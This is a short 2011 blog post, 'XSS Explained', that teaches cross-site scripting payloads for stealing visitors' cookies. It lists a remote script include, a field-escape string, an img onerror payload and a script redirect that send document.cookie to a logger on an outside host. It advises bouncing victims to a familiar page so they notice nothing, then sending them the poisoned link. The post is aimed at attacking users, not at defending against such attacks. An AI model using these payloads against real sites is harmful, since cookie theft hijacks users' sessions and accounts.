Search This Blog

Thursday, March 3, 2011

XSS Explained

Here is where I will discuss some different syntaxes of XSS and how to steal cookies. I will also explain the idea of how the XSS syntaxes work.

a)
< script src=http://site.com/evil.js >

This works because when a website allows JavaScript to be executed, you can have a pre-made JavaScript file type on a remote server and the < script src=" " > tag will read from it and execute it on the page.

b)
'"/ >< />< script src=http://site.com/evil.js >

This is what I mostly use to escape fields on the website. Let's say that I search for "test", and the next page has the word "test" in the search field again, I will try to escape it with this code.

c)
< img src=xss.png onerror="document.location ='http://site.com/log.php? cookie='"+document.cookie >

This script will try to include a fake image named "xss.png" and will automatically error. On the error, it will execute the JavaScript to redirect to a logger and log the victim's cookie.

d)
< script> document.location
="http://sitea.com/log.php?
c="+document.cookie
+"&redirect=http://
siteb.com";< /script >

This is the most basic JavaScript for a cookie stealing attempt. This is what would most likely be placed inside one of the many .js files being retrieved by a remote server.

This script will redirect the webpage to http://sitea.com/log.php?c=[THEIR COOKIE]&redirect=http://siteb.com

The GET variable c contains the user's cookie from the following page. The redirect part is just another GET var that will redirect them away from the logger, to another website, so that they do not notice anything TOO strange. The best way to avoid suspicion is to redirect them to the same site, just a different page.

Breakdown of the JavaScript if you didn't already know it: document.location=""; or document.location(); is a function in JavaScript that changes the document (webpage)'s location. document.cookie is JavaScript's way of storing cookie information on a website. Mostly everything can be called from document.* whatever.

After that, all that is pretty much left to do is send a link containing the URL with the XSS vulnerability in it to your victim and let he/she click it, while you wait for your cookies.


Back to Main Content